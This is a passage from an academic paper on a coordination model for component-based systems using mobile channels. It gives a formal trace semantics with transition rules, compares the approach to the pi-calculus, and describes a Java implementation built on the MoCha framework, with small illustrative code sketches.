Third is architectural expressiveness. Like messaging, using channels to express the communication carried out within a system is architecturally much more expressive than using shared data spaces. With a shared data space, it is more difficult to see which components exchange data with each other, and thus depend on or are related to each other, because in principle, any component connected to the data space can exchange data with any or all other components in the system. Using channels, it is easy to see which components exchange data with each other, making it easier to apply tools for analysis of the dependencies and data-flow.
Finally, in contrast to events, channels allow several different types of connections among components, e.g., synchronous, FIFO, etc., without the components knowing which channel types they are dealing with. This makes it possible to coordinate components from the 'outside' (exogenous coordination).
3. Mobile Channels
In our coordination model, components interact with each other through mobile channels. A channel is called mobile when the identities of its channel-ends can be passed on through channels to other components in the system (logical mobility). Furthermore, in distributed systems the ends of a mobile channel can physically move from one location to another, where a location is a logical address space in which a component executes (physical mobility). Because the communication via channels is anonymous, when a channel-end moves (physically or logically), the component at its other end is not affected.
Mobility allows dynamic reconfiguration of channel connections among the components in a system, a property that is very useful and even crucial in systems where the components themselves are mobile.
A component is called mobile when, in a distributed system, it can move from one location (where its code is executing) to another. For example, mobile Internet agents can be seen as mobile components. The structure of a system with mobile components changes dynamically during its lifetime. Mobile channels give the crucial advantage of moving a channel-end together with its component, instead of deleting a channel and creating a new one.
In distributed systems, a channel is a *resource* that must be shared among several component instances. Therefore, in our model, a component instance must successfully connect to a channel-end before it can use that channel-end, and disconnect from it when it is no longer needed. At every moment in time, at most one component can be connected to a particular channel-end. Therefore, although many components may know the identity of a specific channel-end, the communication via mobile channels is still one-to-one.
As a concrete example of the utility of mobile channels, suppose we want to use agents to search for some specific information, e.g., coffee prices, on the Internet. Agents consult different XML[33] information sources, like databases and Internet pages. Each information source has a channel where requests can be issued, and an agent knows the identity of the source end of this channel plus the location of the information source. The agents may have a list with these channel-ends available at their creation, or this information may be passed to them through channels. In our example, we use a mobile agent that moves to the information sources at various locations. An alternative that we will consider later is to create an agent at every location.

A component $U$ has two channel connections for interaction with a mobile agent, one to send instructions and the other to receive results. At some point in time, $U$ asks the agent to search for MoCha-bean prices. Figure 2 shows the situation after the agent moves to the information source $A$ which is in a different Internet location, as expressed by the dashed lines in the figure. Right after the move, the agent creates a channel meant for reading information from the information source, and sends a request to $A$ together with the identity of the source channel-end of the created channel.
At some point in time the agent finishes searching the information source $A$ and writes all relevant information it finds for the component $U$ into the proper source channel-end. Regardless of whether or not this information has already been read by $U$, the agent moves to the location of the next information source (see figure 3). Together with the agent, the two ends of the channels connecting it to $U$ also move with it to this new location. However, the component $U$ is not affected by this. It can still write to and read from its channel-ends, even during the move; all data in a mobile channel are preserved while its ends move. For the agent the advantages of moving the channel-ends along with it is that it avoids all kinds of problems that arise if it were to delete the channels and create new ones after the move, e.g., checking if the channels are empty, notifying $U$ that it cannot use them anymore, perhaps some locking
issues to accomplish the latter, etc.
In our alternative version, we have a different non-mobile agent at each location, instead of one mobile agent, and there are only two channels for interaction with the component $U$. The channel-ends meant for the agents then move from one agent to the other. From the point of view of the component $U$ there is no difference between the two alternatives in our example.
In our example, the two channel-ends used by $U$ do not move, but it is possible to have mobility at both ends of a channel; if desired one can extend the example by passing these channel-ends on to other components in the system.
4. A Semantic Approach to our Model
In this section, we give a more precise and formal description of our coordination model, by presenting a compositional trace-based semantics of component-based systems. The semantics forms the formal basis of the notion of ‘contracts’ and provides a formal basis of the Java implementation in the next section.
We summarize the following from the previous sections. A component is a black-box entity that communicates through mobile channels. A channel has two ends each of which can either be a source or a sink end; a component writes values to the source and reads/takes values from the sink. The identity of channel-ends can also be communicated through channels, allowing dynamic reconfiguration of channel-end connections in a system. The data-flow is locally one way. Channels can be synchronous or asynchronous. Because in a distributed system a channel is a resource which must be shared among several component instances, a component instance must successfully connect to a channel-end before being able to use it; therefore, it must also disconnect from it when the channel-end is not needed anymore. In our model, at most one component instance can be connected to a particular channel-end at any given time, making the communication one-to-one. This ensures the soundness and completeness properties that are the prerequisites for compositionality [5]. Our one-to-one channels can still be composed into many-to-many connectors, while preserving these prerequisites for compositionality [3, 4].
Physical movement of channel-ends (see section 3) is present in our model for reasons of efficiency: to minimize the amount of non-local transfers in distributed systems. Therefore, both in the semantics and in the implementation of section 5, components do not directly perform any kind of move operation on channel-ends. A physical channel-end move is performed indirectly when a component instance either successfully connects to the specific channel-end or itself moves to a new (physical) location, in which case all its connected channel-ends move with it. This means that the physical layout of the system, whether distributed or not, is of no concern to the semantics, which rightfully abstracts from it.
Below, we first describe the observable behavior of the interface of a component, that is, its externally observable behavior, in terms of a transition system that abstracts away its internal behavior. Next, we introduce a global transition system which describes the behavior of a component-based system in terms of the interactions of its components, and show how this behavior can be obtained in a compositional manner. Finally, as an alternative to our global transition system, we make some comments on how to model mobile channels in the $\pi$-calculus.
4.1. Component Transition System
**Definition 4.1.** Given a set $AState$ of abstract states ranged over by $a$, and (mutually disjoint) sets $Source$ and $Sink$ of all source and sink channel-ends, we specify a component by a transition system $Comp = (Conf, \rightarrow, c_0)$, where $Conf = AState \times \mathcal{P}(Source \cup Sink)$ is the set of configurations, with typical element $c$. The configuration of a component instance thus consists of a pair $\langle a, K \rangle$, where $K$ is the set of channel-ends known in this particular configuration. The initial configuration $c_0$ is defined as $\langle a_0, \emptyset \rangle$, where $a_0$ denotes the initial abstract state. We define the transition relation as $\rightarrow \subseteq Conf \times Act \times Conf$; as usual, we use $c \xrightarrow{act} c'$ to indicate that $(c, act, c') \in \rightarrow$.
The set of actions $Act$ consists of the following operations:
- $e \downarrow$ connect the executing component instance to the channel-end $e$.
- $e \uparrow$ disconnect the executing component instance from the channel-end $e$.
- $s!v$ write the value $v$ to the source channel-end $s$.
- $t?v$ take the value $v$ from the sink channel-end $t$.
- $t¿v$ read the value $v$ from the sink channel-end $t$ (read is the non-destructive version of take).
- $\nu(s, t)$ create a new channel with source- and sink-ends $s$ and $t$.
- $\nu(Comp, K)$ create a new component instance with the initial set of known channel-ends $K$.
- $\tau$ is the invisible operation we use to denote all other component operations that are not related to channels.
Here $v$ ranges over the set of values which includes $Source \cup Sink$. Furthermore, we have $s \in Source$, $t \in Sink$, and $e \in Source \cup Sink$.
4.2. Local Conditions
We assume that the transition relation of a component satisfies the following conditions:
1. If \( \langle a, K \rangle \xrightarrow{e\downarrow} \langle a', K' \rangle \) then \( e \in K \) and \( K' = K \).
A component instance can connect only to a channel-end it knows, and this operation does not affect its set of known channel-ends.
2. If \( \langle a, K \rangle \xrightarrow{e\uparrow} \langle a', K' \rangle \) then \( e \in K \) and \( K' = K \).
The same holds for disconnect.
3. If \( \langle a, K \rangle \xrightarrow{s!v} \langle a', K' \rangle \) then \( s \in K \) and \( K' = K \).
A component instance can write only to a channel-end it knows, and its set of known channel-ends is not affected.
4. If \( \langle a, K \rangle \xrightarrow{t?v} \langle a', K' \rangle \) and \( v \in \text{Source} \cup \text{Sink} \) then \( t \in K \) and \( K' = K \cup \{v\} \).
A component instance can take only from a channel-end it knows. If the value obtained is a channel-end, it becomes known to the component instance.
5. If \( \langle a, K \rangle \xrightarrow{t?v} \langle a', K' \rangle \) and \( v \notin \text{Source} \cup \text{Sink} \) then \( t \in K \) and \( K' = K \).
A component instance can take only from a channel-end it knows. If the value obtained is not a channel-end, its set of known channel-ends is not affected.
6. All conditions for take also apply to the operation read.
7. If \( \langle a, K \rangle \xrightarrow{\nu(s,t)} \langle a', K' \rangle \) then \( s \notin K \), \( t \notin K \), and \( K' = K \cup \{s, t\} \).
When a new channel is created, the two new channel-ends are added to the set of known channel-ends of the component instance.
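To make conditions 1-7 concrete, the following Java sketch (ours, not part of MoCha; the string encoding of actions is an assumption for the example) computes the successor known-set $K'$ for a given action, rejecting actions that refer to unknown channel-ends:

```java
import java.util.HashSet;
import java.util.Set;

// Sketch of conditions 1-7: how an action transforms the set K of
// channel-ends known to a component instance.
public class KnownEnds {
    // Returns K' for the given action, or throws if the action is not
    // enabled because it refers to a channel-end outside K.
    static Set<String> step(Set<String> k, String action,
                            String end, String value, boolean valueIsEnd) {
        Set<String> next = new HashSet<>(k);
        switch (action) {
            case "connect", "disconnect", "write" -> {        // conditions 1-3: K' = K
                if (!k.contains(end)) throw new IllegalStateException("unknown end " + end);
            }
            case "take", "read" -> {                          // conditions 4-6
                if (!k.contains(end)) throw new IllegalStateException("unknown end " + end);
                if (valueIsEnd) next.add(value);              // a received channel-end becomes known
            }
            case "newChannel" -> {                            // condition 7: fresh ends join K
                if (k.contains(end) || k.contains(value))
                    throw new IllegalStateException("channel-ends must be fresh");
                next.add(end);                                // end = source s
                next.add(value);                              // value = sink t
            }
            default -> { }                                    // tau: K unchanged
        }
        return next;
    }

    public static void main(String[] args) {
        Set<String> k = new HashSet<>(Set.of("t1"));
        k = step(k, "take", "t1", "s2", true);  // a source end s2 arrives over t1
        System.out.println(k);                  // s2 is now known, so writing to it is enabled
    }
}
```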
### 4.3. Global Transition System
We consider a component-based system \( \pi = \{\text{Comp}_1, \ldots, \text{Comp}_n\} \), where \( \text{Comp}_i = \langle \text{Conf}_i, \rightarrow_i, c_i^0 \rangle \), for \( i = 1, \ldots, n \). To identify component instances we use the infinite set \( \text{CID} \) of component id's, with
its typical element \( \text{id} \). A system configuration is a tuple \( \langle \sigma, \gamma, \text{Chan} \rangle \), where \( \sigma \) and \( \gamma \) are two partial
functions defined as:
\[
\sigma: \text{CID} \rightarrow \cup_i \text{Conf}_i \text{ and } \gamma: (\text{Source} \cup \text{Sink}) \rightarrow \text{CID},
\]
and
\[
\text{Chan} \subseteq \text{Source} \times \text{Sink}.
\]
The function \( \sigma \) maps every existing component instance (i.e., every element of its domain) of some \( \text{Comp}_i \) to its current configuration \( c \in \text{Conf}_i \). The function \( \gamma \) maps every channel-end to the id of the component instance it is connected to; a channel-end \( e \) is disconnected if \( \gamma(e) \) is undefined. The set \( \text{Chan} \subseteq \text{Source} \times \text{Sink} \) indicates which channel-end pairs constitute a channel.
We now present a labelled transition system which describes the observable interaction of components and channels at the system level. We have the following global actions: \( e \downarrow id \), which indicates that the component instance \( id \) connects to \( e \); \( e \uparrow id \), which indicates that the component instance \( id \) disconnects from \( e \); \( \langle s, t, v, ? \rangle \), which indicates that the value \( v \) has been taken from the sink \( t \) via a synchronous communication along the channel \( \langle s, t \rangle \); similarly, \( \langle s, t, v, ¿ \rangle \) indicates that the value \( v \) has been read from the sink \( t \) via a synchronous communication along the channel \( \langle s, t \rangle \); \( \langle id, s, t \rangle \), which indicates that the component instance \( id \) has created the channel \( \langle s, t \rangle \); finally, \( \langle id, id', K \rangle \), which indicates the creation by \( id \) of a new component instance \( id' \) with the initial set of channel-ends \( K \).
The channels in our transition system are all synchronous, since this is the most basic channel type. Other channels can be viewed as special types of components whose communication with the rest of the system can be described using synchronous channels only. Therefore, our transition system generalizes to systems with any type of mobile channels.
connect
\[
\frac{\sigma(id) \xrightarrow{e\downarrow} c}{\langle \sigma, \gamma, \text{Chan} \rangle \xrightarrow{e \downarrow id} \langle \sigma', \gamma', \text{Chan} \rangle}
\]
where \( \gamma(e) \) is either undefined or equal to \( id \), \( \sigma' = \sigma[c/id] \), and \( \gamma' = \gamma[id/e] \).
A component instance can connect to a channel-end if either the channel-end is disconnected or it is already connected to the same component instance.
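The components of a system configuration \( \langle \sigma, \gamma, \text{Chan} \rangle \) and the precondition of the connect rule above can be sketched with plain Java maps and sets (class and field names are ours, not MoCha's):

```java
import java.util.*;

// Sketch of a system configuration: sigma maps instance ids to their
// (here simplified) configurations, gamma maps channel-ends to the id of
// the instance connected to them (absent key = disconnected), and chan
// records which (source, sink) pairs form a channel.
public class SystemConfig {
    final Map<String, String> sigma = new HashMap<>();
    final Map<String, String> gamma = new HashMap<>();
    final Set<List<String>> chan = new HashSet<>();

    // The connect rule's side condition: gamma(e) must be undefined or
    // already equal to id; on success, gamma is updated at e.
    boolean connect(String id, String end) {
        String owner = gamma.get(end);
        if (owner != null && !owner.equals(id)) return false;
        gamma.put(end, id);
        return true;
    }

    public static void main(String[] args) {
        SystemConfig g = new SystemConfig();
        g.chan.add(List.of("s1", "t1"));           // one channel (s1, t1)
        System.out.println(g.connect("A", "s1"));  // A connects to the free end s1
        System.out.println(g.connect("B", "s1"));  // B is refused: s1 is held by A
    }
}
```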
disconnect
\[
\frac{\sigma(id) \xrightarrow{e\uparrow} c}{\langle \sigma, \gamma, \text{Chan} \rangle \xrightarrow{e \uparrow id} \langle \sigma', \gamma', \text{Chan} \rangle}
\]
where \( \sigma' = \sigma[c/id] \) and
\[
\gamma' = \begin{cases} \gamma[\bot/e] & \text{if } \gamma(e) = id \\ \gamma & \text{if } \gamma(e) \neq id \end{cases}
\]
(here \( \gamma'(e) = \bot \) indicates that \( \gamma'(e) \) is undefined).
A component instance can disconnect from a channel-end if it is currently connected to it. The disconnect operation also succeeds if the component instance was not connected to the channel-end in the first place.
take and write
\[
\frac{\sigma(\gamma(s)) \xrightarrow{s!v} c \quad \sigma(\gamma(t)) \xrightarrow{t?v} c' \quad \langle s, t \rangle \in \text{Chan} \quad \gamma(s) \neq \gamma(t)}{\langle \sigma, \gamma, \text{Chan} \rangle \xrightarrow{\langle s, t, v, ? \rangle} \langle \sigma', \gamma, \text{Chan} \rangle}
\]
where \( \sigma' = \sigma[c/\gamma(s)][c'/\gamma(t)] \). The operations take and write must be performed at the same time on the two ends of the same channel. The channel-ends must be connected to component instances; we do not have to check this, however, since the function \( \gamma \) returns only a connected component instance. Since self-communication is an internal, non-global issue of a component, we insist that \( \gamma(s) \neq \gamma(t) \).
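As an analogy (ours, not MoCha's actual implementation), Java's `SynchronousQueue` exhibits the same rendezvous behaviour: a `put` on one end completes only together with a `take` on the other, so the two steps form one synchronised transition as in the take-and-write rule.

```java
import java.util.concurrent.SynchronousQueue;

// A synchronous channel analogy: the writer blocks in put() until the
// reader performs the matching take().
public class SyncChannelDemo {
    public static void main(String[] args) throws Exception {
        SynchronousQueue<String> channel = new SynchronousQueue<>();
        Thread writer = new Thread(() -> {
            try {
                channel.put("v");   // blocks until a taker arrives
            } catch (InterruptedException e) {
                Thread.currentThread().interrupt();
            }
        });
        writer.start();
        String v = channel.take();  // rendezvous happens here
        writer.join();
        System.out.println("transferred: " + v);
    }
}
```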
read and write
\[
\frac{\sigma(\gamma(s)) \xrightarrow{s!v} c \quad \sigma(\gamma(t)) \xrightarrow{t¿v} c' \quad \langle s, t \rangle \in \text{Chan} \quad \gamma(s) \neq \gamma(t)}{\langle \sigma, \gamma, \text{Chan} \rangle \xrightarrow{\langle s, t, v, ¿ \rangle} \langle \sigma', \gamma, \text{Chan} \rangle}
\]
where \( \sigma' = \sigma[c'/\gamma(t)] \). The case of read and write is analogous to that of take and write, except that the write operation does not yet succeed: only in combination with a take can a write succeed, and before then many reads can happen on the same channel. The component instance performing the write can be seen as an unbounded source of the same value \( v \) until a take operation is performed.
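The difference between read and take can be sketched as follows (our illustration, not MoCha code): an uncompleted write offers a value that reads may observe repeatedly, and only a take consumes it and thereby completes the write.

```java
// Sketch of read vs. take on a synchronous channel: a pending write acts
// as a source of the same value until a take completes it.
public class ReadTakeSketch {
    private Object pending;       // value offered by an uncompleted write
    private boolean hasPending;

    synchronized void offer(Object v) { pending = v; hasPending = true; }

    synchronized Object read() {  // non-destructive: the write stays pending
        return hasPending ? pending : null;
    }

    synchronized Object take() {  // destructive: completes the pending write
        Object v = hasPending ? pending : null;
        hasPending = false;
        pending = null;
        return v;
    }

    public static void main(String[] args) {
        ReadTakeSketch ch = new ReadTakeSketch();
        ch.offer("v");
        System.out.println(ch.read());  // the value can be read many times
        System.out.println(ch.read());
        System.out.println(ch.take());  // the take completes the write
        System.out.println(ch.read());  // nothing is pending anymore
    }
}
```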
new channel
\[
\frac{\sigma(id) \xrightarrow{\nu(s,t)} c}{\langle \sigma, \gamma, \text{Chan} \rangle \xrightarrow{\langle id, s, t \rangle} \langle \sigma', \gamma', \text{Chan}' \rangle}
\]
where \( \sigma' = \sigma[c/id] \), \( \gamma' = \gamma[\bot/s][\bot/t] \), \( \langle s, t \rangle \notin \text{Chan} \), and \( \text{Chan}' = \text{Chan} \cup \{ \langle s, t \rangle \} \). Upon creation of a new channel, the pair of channel-ends must not already exist. The new pair is added to \( \text{Chan} \), and both ends are initially disconnected in \( \gamma' \).
new component instance
\[
\frac{\sigma(id) \xrightarrow{\nu(\text{Comp}_i, K)} c}{\langle \sigma, \gamma, \text{Chan} \rangle \xrightarrow{\langle id, id', K \rangle} \langle \sigma', \gamma, \text{Chan} \rangle}
\]
where \( id' \) does not occur in the domain of \( \sigma \), \( \sigma' = \sigma[c/id][c'/id'] \), and \( c' = \langle a_0, K \rangle \), with \( a_0 \) the initial abstract state of \( \text{Comp}_i \).
The creation of a new component instance consists of the selection of a fresh component identifier and the initialization of its configuration.
4.4. Trace Semantics
Given an initial set \( K \) of channel-ends, we define formally the interface \( \text{Int}(\text{Comp}, K) \) of a component \( \text{Comp} \) as the set of component traces
\[
\{ \theta \mid \langle a_0, K \rangle \xrightarrow{\theta} \},
\]
where \( a_0 \) denotes the initial (abstract) state of \( \text{Comp} \) and \( \xrightarrow{\theta} \) is the reflexive-transitive closure of the transition relation \( \rightarrow \) of \( \text{Comp} \), additionally collecting the action-labels into the sequence \( \theta \).
In order to obtain the global traces generated by the global transition system in a compositional manner from the interfaces of its components, we introduce a projection operator \( P(\theta, id, K) \) that extracts from the global trace \( \theta \) the local trace of component \( id \) assuming that it is (initially) connected to the channel-ends in \( K \).
- **connect:**
\[
\begin{align*}
P(e \downarrow id.\theta, id, K) &= e \downarrow . P(\theta, id, K \cup \{ e \}) \\
P(e \downarrow id'.\theta, id, K) &= P(\theta, id, K) \quad \text{id} \neq id'
\end{align*}
\]
- **disconnect:**
\[
\begin{align*}
P(e \uparrow id.\theta, id, K) &= e \uparrow . P(\theta, id, K \setminus \{ e \}) \\
P(e \uparrow id'.\theta, id, K) &= P(\theta, id, K) \quad \text{id} \neq id'
\end{align*}
\]
- **take and write:**
\[
P(\langle s, t, v, ? \rangle.\theta, id, K) = \begin{cases}
s!v.\, P(\theta, id, K) & s \in K \\
t?v.\, P(\theta, id, K) & t \in K \\
P(\theta, id, K) & s, t \notin K
\end{cases}
\]
- **read and write:**
\[
P(\langle s, t, v, ¿ \rangle.\theta, id, K) = \begin{cases}
s!v.\, P(\theta, id, K) & s \in K \\
t¿v.\, P(\theta, id, K) & t \in K \\
P(\theta, id, K) & s, t \notin K
\end{cases}
\]
- **new channel**:
\[
P(\langle id', s, t \rangle.\theta, id, K) = \begin{cases}
\nu(s, t).\, P(\theta, id, K) & id = id' \\
P(\theta, id, K) & id \neq id'
\end{cases}
\]
- **new component**:
\[
P(\langle id', id'', K' \rangle.\theta, id, K) = \begin{cases}
\langle id'', K' \rangle.\, P(\theta, id, K) & id = id' \\
P(\theta, id, K) & id \neq id'
\end{cases}
\]
We define \(P(\theta, id)\) as \(P(\theta, id, \emptyset)\).
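The case analysis above can be turned into a small executable sketch (ours; events are simplified to records, and only the connect, disconnect, and take-and-write cases are shown) that extracts one instance's local trace from a global trace:

```java
import java.util.*;

// Sketch of the projection operator P(theta, id, K): walk a global trace
// and keep the local actions of one component instance, maintaining the
// set K of channel-ends it is connected to.
public class Projection {
    // For connect/disconnect events, field s holds the channel-end e.
    record Ev(String kind, String id, String s, String t, String v) {}

    static List<String> project(List<Ev> theta, String id, Set<String> k) {
        List<String> local = new ArrayList<>();
        Set<String> known = new HashSet<>(k);
        for (Ev e : theta) {
            switch (e.kind()) {
                case "connect" -> {
                    if (id.equals(e.id())) { local.add(e.s() + "↓"); known.add(e.s()); }
                }
                case "disconnect" -> {
                    if (id.equals(e.id())) { local.add(e.s() + "↑"); known.remove(e.s()); }
                }
                case "takewrite" -> {               // global event (s, t, v, ?)
                    if (known.contains(e.s())) local.add(e.s() + "!" + e.v());
                    else if (known.contains(e.t())) local.add(e.t() + "?" + e.v());
                    // neither end connected to id: the event is invisible locally
                }
                default -> { }
            }
        }
        return local;
    }

    public static void main(String[] args) {
        List<Ev> theta = List.of(
            new Ev("connect", "A", "s1", null, null),
            new Ev("connect", "B", "t1", null, null),
            new Ev("takewrite", null, "s1", "t1", "7"));
        System.out.println(project(theta, "A", Set.of())); // A's side of the exchange
    }
}
```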
We have the following compositionality result.
**Theorem 4.1.** The set of global traces of a system of components \(\{\text{Comp}_1, ..., \text{Comp}_n\}\) generated by the global transition system equals the set
\[
\{\theta \mid \text{Ok}(\theta) \text{ and } \forall id \in \text{comp}(\theta). P(\theta, id) \in \text{Int}(\text{Comp}, K)\},
\]
where \(\text{comp}(\theta)\) denotes the set of component instances occurring in \(\theta\). The predicate \(\text{Ok}(\theta)\) rules out occurrences in \(\theta\) of communications involving channel-ends that are disconnected.
The proof of this theorem proceeds by a straightforward induction on the length of the computation.
It would be interesting to investigate if the above trace semantics is fully abstract with respect to an appropriate testing equivalence \([11]\).
### 4.5. Mobile Channels as \(\pi\)-calculus Processes
In section 4.3 we used a simple labelled transition system to model the observable interaction between the components and channels of a system, which suffices for the purposes of this paper. However, this observable interaction can also be modelled using more elaborate semantic frameworks such as the $\pi$-calculus \([23]\). In \([14]\) we introduce the MoCha-\(\pi\) calculus, an exogenous coordination calculus that extends the \(\pi\)-calculus and is based on mobile channels. Channels in MoCha-\(\pi\) are (special kinds of) \(\pi\)-calculus processes. This allows the calculus to have user-defined channel types without having to change the rules of the calculus itself. MoCha-\(\pi\) offers high-level interface \textit{write}, \textit{take}, \textit{connect} and \textit{disconnect} operations on mobile channels. The \textit{write} and \textit{take} actions are dynamically transformed into a pattern of traditional \(\pi\)-calculus synchronous actions when a process \textit{connected} to a particular channel-end performs one of these I/O actions on it. Therefore, any mobile channel type, like FIFO, is dynamically transformed into a \(\pi\)-calculus process that interacts with its environment by means of synchronous \(\pi\)-calculus channel actions. Just like in our coordination model, processes in MoCha-\(\pi\) have no direct references to channels but only to channel-ends, and therefore all interface operations are performed on channel-ends. Furthermore, another difference with the \(\pi\)-calculus is that MoCha-\(\pi\) treats channels as resources: processes must compete with each other to gain access to a particular channel-end. More details about MoCha-\(\pi\) and the modelling of mobile channels in the \(\pi\)-calculus can be found in \([14]\).
5. Implementation in Java
The coordination model we present in this paper can be implemented in any object-oriented programming language that supports distributed environments, like Java[18], or C++[28]. In this section we describe an implementation of our model in the Java language.
The implementation consists of a framework that provides (a) a precompiler tool for writing components, (b) mobile channels, and (c) operations on these channels. All the component source files have the extension .cmp, and the precompiler transforms them into normal Java files. We do not define a new language: the .cmp files contain Java code and the precompiler just verifies certain restrictions we need to impose to have components in Java. We explain these restrictions gradually while describing the implementation.
5.1. Components in Java
Usually, JavaBeans [19] are used to implement components in Java. However, they do not comply with our definition of components (see section 2.1) for two reasons. First, a JavaBean consists of just one class, and this puts a serious restriction on the internal implementation of components. Second, JavaBeans communicate with each other through events, while we want to use channels (see section 2.3).
Instead of using JavaBeans to implement components, we use the package feature of Java. However, a package is too broad and does not provide the hard boundaries we need for components (see section 2.2). Therefore, we impose some restrictions that must be verified by our precompiler. These restrictions are (1) a component must have at least one class that represents the component’s interface, through which all coordination and access to channels takes place; (2) these interface classes are the only public classes in a package; and (3) only interface classes can have methods that are public. For simplicity, in the sequel we assume that the interface of a component consists of just one class.
Implementing a component as a package plus the restrictions explained above has two major advantages. One advantage is that access to a component is possible only through its interface. This, combined with the fact that internal references cannot be sent through a channel (see section 5.5), makes it possible to protect the internal implementation of a component.
The second advantage is that restrictions (1), (2) and (3) are so minimal that they do not impose any real restrictions concerning the internal implementation of a component. A component may consist of one or more objects, one or more threads, its implementation may be distributed, or it may be a channel-based component system itself, etc.
5.2. MoCha
Our Java implementation uses the mobile channels provided by the MoCha package. MoCha, is a framework for mobile channels in distributed environments that supports mobility as described in section 3. More details on MoCha can be found in [12, 7].
In figure 4, we show how a channel is realized in MoCha. For components, a channel consists of two data-structures, the source and the sink channel-ends, which they (separately) refer to through interface references. An interface reference is a reference from a component to a channel-end, restricting the access of the component to only the pre-defined operations on the channel. These operations include:
create, read, take, write, move, and delete. The ends of a channel must internally know each other to keep the identity of the channel and control communication. For this purpose, the ends have references to each other: the sink_rf and source_rf-fields in the figure. If the type of a channel is asynchronous then its channel-ends also have references to a buffer. The implementation of this buffer depends on the asynchronous channel type.
Figure 5 shows the implementation of an asynchronous FIFO mobile channel in MoCha. The buffer is implemented as a chain of unbounded FIFO buffers, each pointing to its next buffer through its link_rf reference. A local buffer is created by the source channel-end each time a component performs the write operation and no local buffer exists yet. This buffer is then added to the existing chain of buffers. A buffer is destroyed when it becomes empty due to take operations on the sink channel-end. Both channel-ends have references, buffer_rf, to a buffer. If this reference is local and the channel-end moves to another location, then the local buffer it refers to does not move with it; instead, the buffer_rf reference is changed from local to non-local. With this implementation each write operation is always local. A read/take operation is either local or non-local, depending on the number of elements needed. Move operations do not involve data transfer of elements at all [12, 7].
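The buffering idea can be reduced to a single-location sketch (ours; the real MoCha buffer is a distributed chain with reference moves, as described above): writes append locally and never block, take is destructive, and read is not.

```java
import java.util.ArrayDeque;
import java.util.Deque;

// Single-location sketch of a FIFO channel: write appends to a buffer
// local to the source end, take removes from the head, read only peeks.
public class FifoChannelSketch {
    private final Deque<Object> buffer = new ArrayDeque<>(); // stands in for the buffer chain

    synchronized void write(Object v) { buffer.addLast(v); }  // always local, never blocks
    synchronized Object take() { return buffer.pollFirst(); } // destructive
    synchronized Object read() { return buffer.peekFirst(); } // non-destructive

    public static void main(String[] args) {
        FifoChannelSketch ch = new FifoChannelSketch();
        ch.write("a");
        ch.write("b");
        System.out.println(ch.read());  // peeks the oldest element
        System.out.println(ch.take());  // removes it
        System.out.println(ch.take());  // FIFO order is preserved
    }
}
```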
MoCha has been implemented in Java using the Remote Method Invocation, RMI, package[20].
5.3. Implementation Overview
Figure 6 shows a general overview of the structure of our implementation. A component is a package that contains (a) a class that describes its interface, and (b) internal entities (objects) created by the component’s programmer(s), which may also be active (threads). This package is produced by our precompiler from its .cmp files.

The component package uses, with the import feature of Java, our BasicComponent package. The BasicComponent package is an extra layer, between the component and the low level mobile channels of MoCha, needed in order to avoid dangling local references to channel-ends that may result from mobility. The BasicComponent package provides channel-end variables that only indirectly refer to MoCha channel-ends.
A component can have Sink and Source channel-end variables. However, it can perform operations on these variables only through the coordination methods of its interface (see section 5.5). To accomplish this, the package BasicComponent provides methods that are protected and which only the coordination methods of the interface can use. The package also provides a Location for the components. This data-structure is used to identify both the location of the component in the network (the IP-address) and the specific virtual machine where it is running.
Observe that instead of MoCha, we can use any other implementation of mobile channels, if desired.
5.4. The Interface of a Component
The interface of a component has two parts: a package private part, accessible only to the internal entities of the component, and a public part, accessible to all the entities in the system. A component interface is a normal Java class and should not be confused with the Interface feature of the language. Figure 7 shows the skeleton of a .cmp file for the interface. There is some syntactic sugar in this file that the precompiler translates into legitimate Java code:
- Component CompName;
must appear as the header of each .cmp file of a component. It is translated into package CompName;
import BasicComponent.*;
- ComponentInterface IntName is translated into public class IntName extends BasicInterface.
The interface class inherits from BasicInterface, a class that contains basic methods for both the public and the package private parts of the interface (see figure 8). The precompiler adds this class to the component’s package, which precludes the possibility of change by the programmers.
Component CompName;
/* add import list here */
ComponentInterface [IntName] // default is CompNameInterface
{
public IntName(/* parameters. For example, an initial set of channel-ends */)
{
super(loc); // call super class constructor
/* Create and initialize here all the entities of the component */
}
public void finalize()
{
/* Method is optional,
* perform cleanup actions before the object is garbage collected */
}
}
Figure 7. The .cmp Skeleton File for the Interface of a Component
The public part of the interface consists of three parts (see figures 7 and 8): one or more constructors, a getLocation method, and a finalize method. The precompiler checks if these items are the only public ones in the interface.
The interface can have one or more public constructors. The class has a super class (see figure 8) that needs a Location as a parameter for its constructor. This way we enforce that each constructor of the interface class must provide a Location, which is either created in the constructor or passed through as a parameter. In the constructor(s) all internal entities of the component must be created and initialized. Thus, in order to create a component, it is enough to import the component’s package and make an instance of its interface class.
Optionally, a finalize method can be present to perform cleanup operations before a component instance is garbage collected.
Channel-end references can be passed on through the constructor of the interface. These channel-end references constitute the initial set of mobile channel-ends known to the newly created component instance as defined in section 2.2. Alternatively, a channel-end set reference can be passed on to the component instance for it to return a new set of channel-ends that it creates during the execution of the constructor.
In this implementation we do not describe, nor dictate, any particular way of expressing the observable behavior of a component. For example, one can use the compositional trace-based semantics given in section 4.
The package private part of the interface includes the coordination methods provided by the class BasicInterface (see figure 8), channel-end variables, and all the other methods and variables in the interface that are not public. We explain the coordination methods in section 5.5.
```java
package CompName;
import MoCha.*;
import BasicComponent.*;

class BasicInterface {
    BasicInterface(Location loc);
    public Location getLocation();
    Object[] CreateChannel(ChannelType type);
    boolean Connect(ChannelEnd ce, int timeout) throws Exception;
    boolean Disconnect(ChannelEnd ce) throws Exception;
    boolean Write(Source ce, Object var, int timeout) throws Exception;
    Object Read(Sink ce, int timeout) throws Exception;
    Object Take(Sink ce, int timeout) throws Exception;
    boolean Wait(String conds, int timeout) throws Exception;
}
```
Figure 8. The BasicInterface Class
For simplicity, we assumed that the interface of a component consists of just one class. However, we do allow components to have more than one ComponentInterface class. Therefore, a component can provide several interfaces to its users with different views and/or functionality.
5.5. The Coordination Operations
The interface of a component provides coordination methods for the active internal objects (i.e., threads) in an instance of that component for operations on channels. These methods are listed in figure 8. The threads cannot perform any operation directly on the channel-ends, because the channel-ends do not provide any methods for them, not even a constructor. Therefore, the only way to perform an operation on a channel is to use the coordination methods in the component interface. The coordination operations are divided into three groups: the topological operations, the input/output operations, and the inquiry operations.
These are basic operations; more complex operations can be created by composing them. It is also the responsibility of the component to ensure proper synchronization for its internal threads if they refer to the same channel-ends. Our basic coordination primitives can be wrapped in component-defined methods to enforce such internal protocols.
